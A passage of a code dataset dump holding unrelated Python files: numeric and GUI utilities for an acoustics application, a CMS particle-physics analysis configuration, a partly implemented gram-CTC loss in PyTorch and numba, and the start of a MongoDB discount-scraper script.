doSomethingHeavy()\n ...\n >>> timeConsumingFunction(5)\n Time to finish timeConsumingFunction: 35.5235 [s]\n '''\n\n @wraps(function)\n def wrapper(*args, **kwargs):\n start_time = time()\n values = function(*args, **kwargs)\n end_time = time()\n print(f'Time to finish {function.__name__}: {end_time - start_time} [s]')\n return values\n return wrapper\n \ndef m_to_mm(m):\n ''' \n Converts meter to millimeter.\n\n Parameters\n ----------\n m: int, float\n Value in meters\n\n Returns\n -------\n out: float\n Value in millimeters\n '''\n return float(m) * 1000\n\ndef mm_to_m(mm):\n ''' \n Converts meter to millimeter.\n\n Parameters\n ----------\n mm: int, float\n Value in millimeters\n\n Returns\n -------\n out: float\n Value in meters\n\n '''\n return float(mm) / 1000\n\ndef inverse_matrix_Nx3x3(A):\n ''' \n Given a 3x3xN matrix, compute its inverse faster than \n numpy's default function.\n\n Parameters\n ----------\n A: numpy.ndarray\n Matrix of shape (N,3,3)\n \n Returns\n -------\n out: numpy.ndarray\n inverse matrix\n '''\n \n b = 1/( A[:,0,0]*A[:,1,1]*A[:,2,2] + A[:,0,1]*A[:,1,2]*A[:,2,0] +\n A[:,0,2]*A[:,1,0]*A[:,2,1] - A[:,0,2]*A[:,1,1]*A[:,2,0] -\n A[:,0,1]*A[:,1,0]*A[:,2,2] - A[:,0,0]*A[:,1,2]*A[:,2,1] )\n\n b11 = A[:,1,1]*A[:,2,2] - A[:,1,2]*A[:,2,1]\n b12 = -( A[:,0,1]*A[:,2,2] - A[:,0,2]*A[:,2,1] )\n b13 = A[:,0,1]*A[:,1,2] - A[:,0,2]*A[:,1,1]\n \n b21 = -( A[:,1,0]*A[:,2,2] - A[:,1,2]*A[:,2,0] )\n b22 = A[:,0,0]*A[:,2,2] - A[:,0,2]*A[:,2,0]\n b23 = -( A[:,0,0]*A[:,1,2] - A[:,0,2]*A[:,1,0] )\n\n b31 = A[:,1,0]*A[:,2,1] - A[:,1,1]*A[:,2,0]\n b32 = -( A[:,0,0]*A[:,2,1] - A[:,0,1]*A[:,2,0] )\n b33 = A[:,0,0]*A[:,1,1] - A[:,0,1]*A[:,1,0]\n\n data = (b*np.array([[b11,b12,b13],[b21,b22,b23],[b31,b32,b33]]))\n invA = np.transpose(data, axes=[2,0,1])\n \n return invA\n\ndef inverse_matrix_3x3(A):\n ''' \n Given a 3x3 matrix, compute its inverse faster than\n numpy's default function.\n\n Parameters\n ----------\n A: numpy.ndarray\n Matrix of shape (3,3)\n \n 
Returns\n -------\n out: numpy.ndarray\n inverse matrix\n\n '''\n \n b = 1/( A[0,0]*A[1,1]*A[2,2] + A[0,1]*A[1,2]*A[2,0] +\n A[0,2]*A[1,0]*A[2,1] - A[0,2]*A[1,1]*A[2,0] -\n A[0,1]*A[1,0]*A[2,2] - A[0,0]*A[1,2]*A[2,1] )\n\n b11 = A[1,1]*A[2,2] - A[1,2]*A[2,1]\n b12 = -( A[0,1]*A[2,2] - A[0,2]*A[2,1] )\n b13 = A[0,1]*A[1,2] - A[0,2]*A[1,1]\n \n b21 = -( A[1,0]*A[2,2] - A[1,2]*A[2,0] )\n b22 = A[0,0]*A[2,2] - A[0,2]*A[2,0]\n b23 = -( A[0,0]*A[1,2] - A[0,2]*A[1,0] )\n\n b31 = A[1,0]*A[2,1] - A[1,1]*A[2,0]\n b32 = -( A[0,0]*A[2,1] - A[0,1]*A[2,0] )\n b33 = A[0,0]*A[1,1] - A[0,1]*A[1,0]\n\n invA = b*np.array([[b11,b12,b13],[b21,b22,b23],[b31,b32,b33]])\n \n return invA\n\ndef _transformation_matrix_3x3(delta_x, delta_y, delta_z, gamma=0):\n ''' \n This method returns the rotation matrix of an element \n based on its spatial position. \n \n Parameters\n ----------\n delta_x: int, float\n value in meters\n \n delta_y: int, float\n value in meters\n\n delta_z: int, float\n value in meters\n\n Returns\n -------\n out: numpy.ndarray(3,3)\n rotation matrix\n\n '''\n\n L_ = np.sqrt(delta_x**2 + delta_y**2)\n L = np.sqrt(delta_x**2 + delta_y**2 + delta_z**2)\n\n cossine_epsilon = L_ / L\n sine_epsilon = - delta_z / L\n \n if L_ > 0.0001*L:\n sine_delta = delta_y/L_\n cossine_delta = delta_x/L_\n else:\n sine_delta = 0\n cossine_delta = 1\n \n cossine_gamma = np.cos(gamma)\n sine_gamma = np.sin(gamma)\n\n # Matrices product order - Rx@Ry@Rz (@Palazzolo, A. Vibration theory and applications with finite element and active vibration control. 
pg 677)\n rotation_matrix = np.array([ [ cossine_delta * cossine_epsilon, \n sine_delta * cossine_epsilon, \n -sine_epsilon ], \n [ cossine_delta * sine_epsilon * sine_gamma - sine_delta * cossine_gamma,\n sine_delta * sine_epsilon * sine_gamma + cossine_delta * cossine_gamma,\n cossine_epsilon * sine_gamma ],\n [ cossine_delta * sine_epsilon * cossine_gamma + sine_delta * sine_gamma,\n sine_delta * sine_epsilon * cossine_gamma - cossine_delta * sine_gamma,\n cossine_epsilon * cossine_gamma ] ]) \n\n return rotation_matrix\n\n\ndef _transformation_matrix_3x3xN(delta_x, delta_y, delta_z, gamma=0):\n ''' \n This method returns the rotation matrices to a set of N elements \n based on their spatial positions. \n \n Parameters\n ----------\n delta_x: numpy.ndarray\n values in meters\n \n delta_y: numpy.ndarray\n values in meters\n\n delta_z: numpy.ndarray\n values in meters\n\n Returns\n -------\n out: numpy.ndarray(N,3,3)\n rotation matrix\n\n '''\n\n number_elements = len(delta_x)\n L_ = np.sqrt(delta_x**2 + delta_y**2)\n L = np.sqrt(delta_x**2 + delta_y**2 + delta_z**2)\n \n cossine_gamma = np.cos(gamma)\n sine_gamma = np.sin(gamma)\n\n sine_delta = np.zeros(number_elements, dtype=float)\n cossine_delta = np.zeros(number_elements, dtype=float)\n\n for i in range(number_elements):\n\n if L_[i] > 0.0001*L[i]:\n sine_delta[i] = delta_y[i]/L_[i]\n cossine_delta[i] = delta_x[i]/L_[i]\n else:\n sine_delta[i] = 0\n cossine_delta[i] = 1\n\n cossine_epsilon = L_ / L\n sine_epsilon = - delta_z / L\n \n # Matrices product order - Rx@Ry@Rz (@Palazzolo, A. Vibration theory and applications with finite element and active vibration control. 
pg 677)\n data_rot = np.array([ cossine_delta * cossine_epsilon, \n sine_delta * cossine_epsilon, \n -sine_epsilon, \n cossine_delta * sine_epsilon * sine_gamma - sine_delta * cossine_gamma,\n sine_delta * sine_epsilon * sine_gamma + cossine_delta * cossine_gamma,\n cossine_epsilon * sine_gamma,\n cossine_delta * sine_epsilon * cossine_gamma + sine_delta * sine_gamma,\n sine_delta * sine_epsilon * cossine_gamma - cossine_delta * sine_gamma,\n cossine_epsilon * cossine_gamma ])\n\n return data_rot.T.reshape(-1,3,3)\n\ndef _transformation_matrix_3x3_by_angles(gamma, epsilon, delta):\n ''' \n This method returns the rotation matrix of an element based on \n the angles of rotations gamma, epsilon and delta. \n \n Parameters\n ----------\n gamma: int, float\n values in radians\n \n epsilon: int, float\n values in radians\n\n delta: int, float\n values in radians\n\n Returns\n -------\n out: numpy.ndarray(3,3)\n rotation matrix\n\n '''\n\n sine_delta = np.sin(delta)\n cossine_delta = np.cos(delta)\n\n sine_epsilon = np.sin(epsilon)\n cossine_epsilon = np.cos(epsilon)\n\n sine_gamma = np.sin(gamma)\n cossine_gamma = np.cos(gamma)\n\n # Matrices product order - Rx@Ry@Rz (@Palazzolo, A. Vibration theory and applications with finite element and active vibration control. 
pg 677)\n data_rot = np.array([ cossine_delta * cossine_epsilon, \n sine_delta * cossine_epsilon, \n -sine_epsilon, \n cossine_delta * sine_epsilon * sine_gamma - sine_delta * cossine_gamma,\n sine_delta * sine_epsilon * sine_gamma + cossine_delta * cossine_gamma,\n cossine_epsilon * sine_gamma,\n cossine_delta * sine_epsilon * cossine_gamma + sine_delta * sine_gamma,\n sine_delta * sine_epsilon * cossine_gamma - cossine_delta * sine_gamma,\n cossine_epsilon * cossine_gamma ])\n\n return data_rot.reshape(3,3)\n\ndef _transformation_matrix_Nx3x3_by_angles(gamma, epsilon, delta):\n ''' \n This method returns the rotation matrices to a set of N elements \n based on the angles of rotations gamma, epsilon and delta. \n \n Parameters\n ----------\n gamma: numpy.ndarray\n values in radians\n \n epsilon: numpy.ndarray\n values in radians\n\n delta: numpy.ndarray\n values in radians\n\n Returns\n -------\n out: numpy.ndarray(N,3,3)\n rotation matrix\n\n '''\n\n sine_delta = np.sin(delta)\n cossine_delta = np.cos(delta)\n\n sine_epsilon = np.sin(epsilon)\n cossine_epsilon = np.cos(epsilon)\n\n sine_gamma = np.sin(gamma)\n cossine_gamma = np.cos(gamma)\n\n # Matrices product order - Rx@Ry@Rz (@Palazzolo, A. Vibration theory and applications with finite element and active vibration control. 
pg 677)\n data_rot = np.array([ cossine_delta * cossine_epsilon, \n sine_delta * cossine_epsilon, \n -sine_epsilon, \n cossine_delta * sine_epsilon * sine_gamma - sine_delta * cossine_gamma,\n sine_delta * sine_epsilon * sine_gamma + cossine_delta * cossine_gamma,\n cossine_epsilon * sine_gamma,\n cossine_delta * sine_epsilon * cossine_gamma + sine_delta * sine_gamma,\n sine_delta * sine_epsilon * cossine_gamma - cossine_delta * sine_gamma,\n cossine_epsilon * cossine_gamma ])\n\n return data_rot.T.reshape(-1,3,3)\n\n\ndef error( msg, title = \" ERROR \"):\n '''\n PyQt5 error message.\n\n Parameters\n ----------\n msg: str\n text to be displayed.\n\n title: str\n window title.\n '''\n\n msg_box = QMessageBox()\n msg_box.setWindowFlags(Qt.WindowStaysOnTopHint)\n # msg_box.setWindowModality(Qt.WindowModal)\n msg_box.setIcon(QMessageBox.Critical)\n msg_box.setText(msg)\n msg_box.setWindowTitle(title)\n msg_box.exec_()\n\ndef info_messages(msg, title = \" INFORMATION \"):\n '''\n PyQt5 info message.\n\n Parameters\n ----------\n msg: str\n text to be displayed.\n\n title: str\n window title.\n '''\n\n msg_box = QMessageBox()\n msg_box.setWindowFlags(Qt.WindowStaysOnTopHint)\n # msg_box.setWindowModality(Qt.WindowModal)\n msg_box.setIcon(QMessageBox.Information)\n msg_box.setText(msg)\n msg_box.setWindowTitle(title)\n msg_box.exec_()\n\ndef remove_bc_from_file(entries_typed, path, keys_to_remove, message):\n try:\n\n bc_removed = False\n config = configparser.ConfigParser()\n config.read(path)\n\n for entry in entries_typed: \n entry_id = str(entry)\n\n if entry_id in config.sections():\n keys = list(config[entry_id].keys())\n\n for key_to_remove in keys_to_remove:\n if key_to_remove in keys:\n bc_removed = True\n config.remove_option(section=entry_id, option=key_to_remove)\n if list(config[entry_id].keys())==[]:\n config.remove_section(section=entry_id)\n \n if bc_removed:\n with open(path, 'w') as config_file:\n config.write(config_file)\n\n if message is not None and 
bc_removed:\n PrintMessageInput([\"Error while removing BC from file\" ,message, \"ERROR\"])\n\n except Exception as log_error:\n PrintMessageInput([\"Error while removing BC from file\" ,str(log_error), \"ERROR\"])\n\n\ndef getColorRGB(color):\n temp = color[1:-1] #Remove \"[ ]\"\n tokens = temp.split(',')\n return list(map(int, tokens))\n\ndef sparse_is_equal(a, b):\n '''\n Function to check if two scipy.sparse matrices are equal. \n \n Notes\n -----\n Because of implementation reasons, the right way to do this is checking \n the differences, not the similarities.\n\n Parameters\n ----------\n a: scipy.sparse\n A sparce matrix.\n\n b: scipy.sparse\n Another sparce matrix.\n\n Returns\n -------\n out: True if the matrices are equal, else False.\n \n Raises\n ------\n Type Error\n If matrices are not sparse.\n '''\n\n if not (issparse(a) and issparse(b)):\n raise TypeError('a and b should be sparse matrices')\n\n diference = a != b\n if isinstance(diference, bool):\n return not diference\n\n if issparse(diference):\n return diference.nnz == 0\n\ndef get_new_path(path, name):\n if \"\\\\\" in path:\n new_path = '{}\\\\{}'.format(path, name)\n elif \"/\" in path:\n new_path = '{}/{}'.format(path, name)\n return new_path\n\ndef get_linear_distribution(x_initial, x_final, N):\n n = np.arange(N)/(N-1)\n return (x_final-x_initial)*n + x_initial\n\ndef create_new_folder(path, folder_name):\n folder_path = get_new_path(path, folder_name)\n if not os.path.exists(folder_path):\n os.mkdir(folder_path)\n return folder_path\n\ndef check_is_there_a_group_of_elements_inside_list_elements(input_list):\n ord_list = np.sort(input_list)\n _value = ord_list[0]\n list_i = [_value]\n list_of_lists = []\n for value in ord_list[1:]:\n if value == _value + 1:\n list_i.append(value)\n else:\n temp_list = list_i.copy()\n list_of_lists.append(temp_list)\n list_i = [value]\n _value = value\n list_of_lists.append(list_i)\n return 
list_of_lists","sub_path":"pulse/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":16261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"372694850","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"CumuDiff\")\n\nprocess.load('Configuration.StandardSequences.Services_cff')\nprocess.load('FWCore.MessageService.MessageLogger_cfi')\nprocess.load('Configuration.StandardSequences.GeometryDB_cff')\nprocess.load(\"TrackingTools/TransientTrack/TransientTrackBuilder_cfi\")\nprocess.load('Configuration.StandardSequences.MagneticField_38T_cff')\nprocess.load('Configuration.StandardSequences.EndOfProcess_cff')\nprocess.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_condDBv2_cff')\n\n\nprocess.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(-1))\nprocess.MessageLogger.cerr.FwkReport.reportEvery = 100\n\nfrom Configuration.AlCa.GlobalTag_condDBv2 import GlobalTag\nprocess.GlobalTag = GlobalTag(process.GlobalTag, '75X_dataRun2_v13', '')\n\nprocess.options = cms.untracked.PSet(\n SkipEvent = cms.untracked.vstring('ProductNotFound')\n)\n\nprocess.source = cms.Source(\"PoolSource\",\n\tfileNames = cms.untracked.vstring(\"file:/afs/cern.ch/user/q/qwang/work/cleanroomRun2/Ana/data/ppReco_GMOV0.root\"),\n\tsecondaryFileNames = cms.untracked.vstring(\n\t\t'file:/afs/cern.ch/user/q/qwang/work/cleanroomRun2/Ana/data/ppReco.root'\n\t\t),\n)\n\n\nimport HLTrigger.HLTfilters.hltHighLevel_cfi\n\nprocess.hltMB = HLTrigger.HLTfilters.hltHighLevel_cfi.hltHighLevel.clone()\nprocess.hltMB.HLTPaths = [\n\t\"HLT_HIL1MinimumBiasHF2AND*\",\n\t\"HLT_HIL1MinimumBiasHF1AND*\",\n]\nprocess.hltMB.andOr = cms.bool(True)\nprocess.hltMB.throw = cms.bool(False)\n\nprocess.TFileService = cms.Service(\"TFileService\",\n fileName = cms.string('cumu.root')\n)\n\n\nprocess.load('HeavyIonsAnalysis.Configuration.collisionEventSelection_cff')\n\nprocess.primaryVertexFilter.src = 
cms.InputTag(\"GMOVertex\")\n\nprocess.load('RecoHI.HiCentralityAlgos.CentralityFilter_cfi')\nprocess.NoffFilter = process.centralityFilter.clone(\n\tselectedBins = cms.vint32(\n\t\t*range(320)\n\t\t),\n\tBinLabel = cms.InputTag(\"Noff\")\n\t)\n\nprocess.eventSelection = cms.Sequence(\n process.hfCoincFilter3\n# + process.primaryVertexFilter\n# + process.clusterCompatibilityFilter\n)\n\n\nprocess.QWV0EventKs = cms.EDProducer('QWV0VectProducer'\n\t\t, vertexSrc = cms.untracked.InputTag('GMOVertex')\n\t\t, trackSrc = cms.untracked.InputTag('generalTracks')\n\t\t, V0Src = cms.untracked.InputTag('generalV0CandidatesNew', 'Kshort')\n\t\t, daughter_cuts = cms.untracked.PSet(\n\t\t\t)\n\t\t, cuts = cms.untracked.VPSet(\n\t\t\tcms.untracked.PSet(\n\t\t\t\tMassmin = cms.untracked.double(0.467)\n\t\t\t\t, Massmax = cms.untracked.double(0.523)\n\t\t\t\t, DecayXYZMin = cms.untracked.double(5.0)\n\t\t\t\t, ThetaXYZMin = cms.untracked.double(0.999)\n\t\t\t\t)\n\t\t\t)\n\t\t)\n\nprocess.QWV0EventLambda = cms.EDProducer('QWV0VectProducer'\n\t\t, vertexSrc = cms.untracked.InputTag('GMOVertex')\n\t\t, trackSrc = cms.untracked.InputTag('generalTracks')\n\t\t, V0Src = cms.untracked.InputTag('generalV0CandidatesNew', 'Kshort')\n\t\t, daughter_cuts = cms.untracked.PSet(\n\t\t\t)\n\t\t, cuts = cms.untracked.VPSet(\n\t\t\tcms.untracked.PSet(\n\t\t\t\tMassmin = cms.untracked.double(1.11)\n\t\t\t\t, Massmax = cms.untracked.double(1.123)\n\t\t\t\t, DecayXYZMin = cms.untracked.double(5.0)\n\t\t\t\t, ThetaXYZMin = cms.untracked.double(0.999)\n\t\t\t\t)\n\t\t\t)\n\t\t)\n\n#process.QWV0EventV0 = process.QWV0EventLambda.clone()\nprocess.QWV0EventV0 = process.QWV0EventKs.clone()\n\nprocess.load('PbPb_HIMB5_ppReco_eff')\nprocess.Noff.vertexSrc = cms.untracked.InputTag('GMOVertex')\nprocess.QWEvent.vertexSrc = cms.untracked.InputTag('GMOVertex')\nprocess.QWEvent.ptMax = cms.untracked.double(100)\n\nprocess.QWCumuDiff = cms.EDAnalyzer('QWCumuDiff',\n\t\ttrackSet = cms.untracked.PSet(\n\t\t\tEta = 
cms.untracked.InputTag('QWEvent', 'eta'),\n\t\t\tPhi = cms.untracked.InputTag('QWEvent', 'phi'),\n\t\t\tRef = cms.untracked.InputTag('QWEvent', 'ref'),\n\t\t\tPt = cms.untracked.InputTag('QWEvent', 'pt'),\n\t\t\tWeight = cms.untracked.InputTag('QWEvent', 'weight'),\n\t\t\t),\n\t\tsigSet = cms.untracked.PSet(\n\t\t\tEta = cms.untracked.InputTag('QWV0EventV0', 'eta'),\n\t\t\tPhi = cms.untracked.InputTag('QWV0EventV0', 'phi'),\n\t\t\tRef = cms.untracked.InputTag('QWV0EventV0', 'Refs'),\n\t\t\tPt = cms.untracked.InputTag('QWV0EventV0', 'pt'),\n\t\t\tWeight = cms.untracked.InputTag('QWV0EventV0', 'weight'),\n\t\t\t),\n\t\tvertexZ = cms.untracked.InputTag('QWEvent', \"vz\"),\n\t\tptBin = cms.untracked.vdouble(0.1, 0.5, 1.0, 1.5, 2.0, 2.5, 3.0, 4.0, 5.0, 6.0, 8.0, 10.0, 12.0, 16.0, 20.0, 30.0, 40.0, 100.0),\n\t\tcentrality = cms.untracked.InputTag('Noff')\n\t\t)\n\n\nprocess.vectV0Mass = cms.EDAnalyzer('QWVectorAnalyzer',\n\t\tsrc = cms.untracked.InputTag(\"QWV0EventV0\", \"mass\"),\n\t\thNbins = cms.untracked.int32(100),\n\t\thstart = cms.untracked.double(0),\n\t\thend = cms.untracked.double(100),\n\t\tcNbins = cms.untracked.int32(100),\n\t\tcstart = cms.untracked.double(.40),\n\t\tcend = cms.untracked.double(0.60),\n\t\t)\n\n## Lambda\n#process.vectV0Mass.cstart = cms.untracked.double(1.0)\n#process.vectV0Mass.cend = cms.untracked.double(1.2)\n\nprocess.vectPt.cNbins = cms.untracked.int32(4000)\nprocess.vectPt.cend = cms.untracked.double(40)\nprocess.vectPtW.cNbins = cms.untracked.int32(4000)\nprocess.vectPtW.cend = cms.untracked.double(40)\n\nprocess.vectPhiV0 = process.vectPhi.clone(src = cms.untracked.InputTag('QWV0EventV0', 'phi'))\nprocess.vectEtaV0 = process.vectEta.clone(src = cms.untracked.InputTag('QWV0EventV0', 'eta'))\nprocess.vectPtV0 = process.vectPt.clone(src = cms.untracked.InputTag('QWV0EventV0', 'pt'))\n\n\nprocess.ana = cms.Path(process.eventSelection * process.makeEvent * process.NoffFilter * process.QWV0EventV0 * process.QWCumuDiff * process.vectMonW 
* process.vectV0Mass * process.vectPhiV0 * process.vectEtaV0 * process.vectPtV0)\n\nprocess.RECO = cms.OutputModule(\"PoolOutputModule\",\n\t\toutputCommands = cms.untracked.vstring('keep *'),\n\t\tSelectEvents = cms.untracked.PSet(\n\t\t\tSelectEvents = cms.vstring('ana')\n\t\t\t),\n\t\tfileName = cms.untracked.string('recoV0.root')\n\t\t)\n\nprocess.out = cms.EndPath(process.RECO)\n\n\nprocess.schedule = cms.Schedule(\n\tprocess.ana,\n#\tprocess.out\n)\n","sub_path":"test/qwcumu_PbPb15_ppReco_GMOKs_eff_v1.py","file_name":"qwcumu_PbPb15_ppReco_GMOKs_eff_v1.py","file_ext":"py","file_size_in_byte":5874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"282095668","text":"import queue\nimport threading\n\nimport numba\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Function, Variable\n\nfrom .utils import log_sum_exp\n\n\n@numba.jit(nogil=True)\ndef _gram_ctc_loss(logits, targets, grams, blank_idx=0):\n \"\"\"\n http://www.cs.toronto.edu/~graves/icml_2006.pdf\n :param logits: numpy array, sequence_len * num_labels\n :param targets: numpy array, target labels\n :param blank: blank index\n :return: loss (float), gradient (same shape as logits)\n \"\"\"\n targets_len = targets.shape[0]\n prediction_len = logits.shape[0]\n num_labels = logits.shape[1]\n\n max_gram_length = len(grams.shape)\n if max_gram_length >= 4:\n raise NotImplementedError\n\n # num_basic_labels = grams.shape[0]\n\n extended_targets = np.ones(targets_len * (max_gram_length + 1) + 1, dtype=np.int64) * blank_idx\n extended_targets_num_grams = np.ones(targets_len * (max_gram_length + 1) + 1, dtype=np.int64)\n\n extended_targets_len = 0\n for i in range(targets_len):\n extended_targets_len += 1 # here was blank, it is in just in extended_targets\n extended_targets[extended_targets_len] = targets[i]\n extended_targets_len += 1\n for start in range(i - 1, max(-1, i - max_gram_length), -1):\n gram_indices = 
tuple(targets[j] for j in range(start, i + 1)) \\\n + tuple(\n 0 for _ in range(max_gram_length - (i - start + 1))) # can't use dict because of numba limitations\n current_ngram = grams[gram_indices]\n if current_ngram > 0: # if such ngram exists\n extended_targets[extended_targets_len] = current_ngram\n extended_targets_num_grams[extended_targets_len] = i - start + 1\n extended_targets_len += 1\n extended_targets_len += 1 # last blank\n\n # alpha and beta computation\n\n # forward - alpha\n log_alpha = np.zeros((extended_targets_len, prediction_len))\n log_alpha[:] = -np.inf # numba bugfix instead of log_alpha.fill(-np.inf)\n if prediction_len > 1 or extended_targets_len == 1:\n log_alpha[0, 0] = logits[0, extended_targets[0]]\n if extended_targets_len > 1:\n log_alpha[1, 0] = logits[0, extended_targets[1]]\n\n last_blank_indices = np.zeros(max_gram_length, dtype=np.int64)\n for t in range(1, prediction_len): # timesteps\n start = max(0, extended_targets_len - 2 * (prediction_len - t) - max_gram_length + 1) # addition for ngrams?\n end = min(t * 2 + 2 + max_gram_length - 1, extended_targets_len) # ???\n log_alpha[start:end, t] = log_alpha[start:end, t - 1]\n last_blank_indices[:] = -1\n for j in range(start, end):\n current_label = extended_targets[j]\n if current_label == blank_idx:\n if last_blank_indices[-1] >= 0:\n for k in range(last_blank_indices[-1] + 1, j):\n log_alpha[j, t] = log_sum_exp(log_alpha[j, t], log_alpha[k, t - 1])\n last_blank_indices[:-1] = last_blank_indices[1:] # shift\n last_blank_indices[-1] = j\n else: # current_label != blank_idx\n raise NotImplementedError\n if j - 2 >= 0 and extended_targets[j - 2] != current_label:\n log_alpha[j, t] = log_sum_exp(log_alpha[j, t], log_alpha[j - 2, t - 1])\n log_alpha[j, t] += logits[t, current_label]\n\n loss_forward = log_alpha[extended_targets_len - 1, prediction_len - 1]\n\n if extended_targets_len > 1:\n i = extended_targets_len - 2\n while i >= 0 and extended_targets[i] != blank_idx:\n 
loss_forward = log_sum_exp(loss_forward, log_alpha[i, prediction_len - 1])\n i -= 1\n\n # backward - beta\n log_beta = np.zeros((extended_targets_len, prediction_len))\n log_beta[:] = -np.inf # numba bugfix instead of log_beta.fill(-np.inf)\n if prediction_len > 1 or extended_targets_len == 1:\n log_beta[extended_targets_len - 1, prediction_len - 1] = 0\n if extended_targets_len > 1:\n raise NotImplementedError # last ngrams find?\n log_beta[extended_targets_len - 2, prediction_len - 1] = 0\n for t in range(prediction_len - 2, -1, -1): # timesteps\n start = max(0, extended_targets_len - 2 * (prediction_len - t))\n end = min(t * 2 + 2, extended_targets_len)\n for j in range(start, end):\n current_label = extended_targets[j]\n log_beta[j, t] = log_beta[j, t + 1] + logits[t + 1, extended_targets[j]]\n if j < extended_targets_len - 1:\n log_beta[j, t] = log_sum_exp(log_beta[j, t],\n log_beta[j + 1, t + 1] + logits[t + 1, extended_targets[j + 1]])\n if current_label != blank_idx and j + 2 < extended_targets_len and extended_targets[\n j + 2] != current_label:\n log_beta[j, t] = log_sum_exp(log_beta[j, t], log_beta[j + 2, t + 1] + logits[\n t + 1, extended_targets[j + 2]])\n\n alpha_beta = log_alpha + log_beta\n\n prob_sum = np.zeros((prediction_len, num_labels))\n prob_sum[:] = -np.inf\n for i in range(extended_targets_len):\n current_label = extended_targets[i]\n prob_sum[:, current_label] = log_sum_exp(prob_sum[:, current_label], alpha_beta[i, :])\n negative_term = prob_sum - loss_forward\n grad = np.exp(logits) - np.exp(negative_term)\n\n return -loss_forward, grad\n\n\ndef _gram_ctc_3d_loss(logits, targets, logits_lengths, targets_length, grams, blank_idx=0):\n batch_size = len(targets_length)\n grads = np.zeros_like(logits)\n\n losses = np.zeros(batch_size)\n\n # parallel computation, threading - because gil is released with numba.jin(nogil=True)\n que = queue.Queue()\n threads = []\n for i in range(batch_size):\n t = threading.Thread(target=lambda q, i, *args: 
q.put((i, _gram_ctc_loss(*args))),\n args=(que, i, logits[i, :logits_lengths[i], :],\n targets[i, :targets_length[i]], grams, blank_idx))\n threads.append(t)\n t.start()\n for t in threads:\n t.join()\n\n while not que.empty():\n i, (loss, grad) = que.get()\n grads[i, :logits_lengths[i], :] = grad\n losses[i] = loss\n\n # iterative computation\n # for i in range(batch_size):\n # loss, grad = _ctc_loss(inputs[:input_sizes[i], i, :], targets_flat[targets_sizes_start[i]:targets_sizes_end[i]])\n # grads[:input_sizes[i], i, :] = grad\n # losses[i] = loss\n\n return losses, grads\n\n\nclass GramCTCLossFunction(Function):\n @staticmethod\n def forward(ctx, logits, targets, logits_lengths, targets_lengths, grams, blank_idx=0):\n # inputs: expected shape of seqLength x batchSize x alphabet_size, after logsoftmax!\n loss, grads = _gram_ctc_3d_loss(\n logits.cpu().numpy(), targets.cpu().numpy(),\n logits_lengths.cpu().numpy(), targets_lengths.cpu().numpy(),\n grams, blank_idx)\n ctx.grads = torch.FloatTensor(grads) # save for backward not works!\n if logits.is_cuda:\n return torch.FloatTensor(loss).cuda(logits.get_device())\n return torch.FloatTensor(loss)\n\n @staticmethod\n def backward(ctx, grad_output):\n \"\"\"\n :param grad_output: [batch_size]\n :return:\n \"\"\"\n loss_grads = Variable(ctx.grads)\n if grad_output.is_cuda:\n loss_grads = loss_grads.cuda(grad_output.get_device())\n grad = loss_grads.contiguous() * grad_output.contiguous().view(-1, 1, 1)\n return grad, None, None, None, None, None\n\n\nif __name__ == \"__main__\":\n from torch.autograd import gradcheck\n\n # gradchek takes a tuple of tensor as input, check if your gradient\n # evaluated with these tensors are close enough to numerical\n # approximations and returns True if they all verify this condition.\n # alphabet_size = 30\n # max_targets_len = 50\n # max_sequence_len = 100\n # batch_size = 2\n\n alphabet_size = 5\n max_targets_len = 100\n max_sequence_len = 200\n batch_size = 2\n\n 
np.random.seed(523)\n\n targets_sizes = np.random.randint(1, max_targets_len + 1, batch_size)\n inputs_sizes = targets_sizes + np.random.randint(0, (max_sequence_len - max_targets_len) + 1, batch_size)\n inputs = np.random.randn(max_sequence_len, batch_size, alphabet_size + 1)\n # expected shape seqLength x batchSize x alphabet_size\n\n sum_target_len = np.sum(targets_sizes)\n targets_flat = (1 + np.random.rand(sum_target_len) * alphabet_size).astype(np.int64)\n # print(targets_flat, inputs.shape, inputs)\n\n input = (nn.LogSoftmax(dim=2)(Variable(torch.FloatTensor(inputs), requires_grad=True)),\n Variable(torch.LongTensor(targets_flat), requires_grad=False),\n Variable(torch.LongTensor(inputs_sizes), requires_grad=False),\n Variable(torch.LongTensor(targets_sizes), requires_grad=False))\n print(GramCTCLossFunction.apply(*input).data[0])\n test = gradcheck(GramCTCLossFunction.apply, input) # , atol=1e-5, rtol=1e-5)\n print(test)\n","sub_path":"pytorch_end2end/functions/gram_ctc_loss.py","file_name":"gram_ctc_loss.py","file_ext":"py","file_size_in_byte":9151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"349912224","text":"import pymongo\nimport boto3\nimport json\nfrom config import BUCKET_NAME, AWS_ACCESS_KEY, AWS_SECRET_KEY, TOPIC_ARN\nfrom aws_storage import get_image_link_s3\n\n# DATABASE_HOST = 'localhost'\nDATABASE_HOST = '18.220.30.245'\nDATABASE_INDEX = 27017\n\n\ndef get_database():\n client = pymongo.MongoClient(DATABASE_HOST, DATABASE_INDEX)\n db = client.test_scrapers\n coll = db.mall_sales\n db.mall_sales_second.drop()\n coll_second = db.mall_sales_second\n # return coll\n return coll_second\n\n\ndef adding_second_discount_to_db(coll, discount_info, mall_name):\n\n search_discount = coll.find_one(\n {'discount_description': discount_info['discount_description'],\n 'shop_name': discount_info['shop_name']}\n )\n\n if not search_discount:\n print(\"Adding new discount: 
